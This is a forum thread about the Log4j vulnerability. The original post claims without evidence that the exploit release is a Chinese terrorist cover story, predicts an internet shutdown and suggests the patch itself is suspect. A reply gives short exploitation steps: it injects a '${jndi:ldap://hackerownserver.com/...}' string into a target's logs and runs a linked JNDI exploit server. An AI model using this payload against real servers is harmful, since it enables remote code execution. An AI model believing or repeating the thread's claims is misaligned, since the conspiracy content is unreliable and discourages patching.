Cyber Pandemics scenario may be already started in real life - PoC of 0 day exploit on log4j released "by Chinese security researcher" - Nobody really releases such 0 days usually as it is dangerous or worth millions on black market

posted 2 years ago by cee8hooz 2 years ago by cee8hooz +7 / -0

according to:

https://securityaffairs.co/wordpress/125480/hacking/log4j-java-library-zeroday.html

https://www.itsecuritynews.info/a-zero-day-exploit-for-log4j-java-library-could-have-a-tsunami-impact-on-it-giants/

It was released by "Chinese researcher". There are no coincidences.

Of course I am not pentester,but I know something about those infosecurity branch and I assure you : NOBODY SANE WOULD RELEASE 0day Proof of Concept BEFORE PATCHES ALREADY WOULD BE MADE.

And also NO,none black hat (criminal hacker) would release that as well as 0day's are regularly bought by intelligence agencies or used by hackers and for white hat legal "hackers" (pentesters) bounties for eligible zero-day exploits range from $2,500 to $2,500,000 , so on black market such working exploit would be worth MILLIONS.

You got it ? Millions $. Nobody sane would EVER release such thing to public without allowing to prepare and criminal would want to earn his fucking money on it.

It is cover story for terrorist attack against the internet we use.Terrorist attack which (oficially) originated from China. It is probably part of their cyber polygon in real life.

**And I write this because it is time anons to do something.I have to ask you to do something.. Full scale memetic answer for this because they shut down the internet is the only option. We must inform people about the truth about this attack before they will shut down the net everywhere we can.

I have also warning for those who want to install those update:

u/BidenIsAPedoFreak wrote on GA

The patch is probably remdesivir or some bullshit they’re force feeding onto poor unsuspecting IT dipshits

And I am suspecting he might be right. Some security researchers shall audit the patch probably.

1 comment

1 comment share save hide report block hide replies

Comments (1)

sorted by:

▲ 1 ▼

– CrazyRussian 1 point 2 years ago +1 / -0

There is nothing new in that vulnerability. May be it was 0-day in distant past, but definitely not now.

And here is how to exploit it, for free:

Do something with target server to make it write to log any string with ${jndi:ldap://hackerownserver.com/resource}. It depends on application running on it, so just select the apropriate way to do it for choosen application
Run this https://github.com/feihong-cs/JNDIExploit on your hackerownserver.com.

How JNDI injection works - https://www.veracode.com/blog/research/exploiting-jndi-injections-java

The core of that hack is a few year (or may be even decade) old hole in all that EnTeRpRi$E java crap. As real EnTeRpRi$Es, no one really do something with it, as usual they make meeting, teambuildings, wrote reports and allocate funds, with millions of presentations and bullshit talk.

They just dig out this old thing to cover all that money laundering and privatisation of company money "cyberattacks" scheme that become very popular in last year.

MSM lies. Even if they are "IT" MSM's. The reality always differ from what they tell you.

permalink save report block reply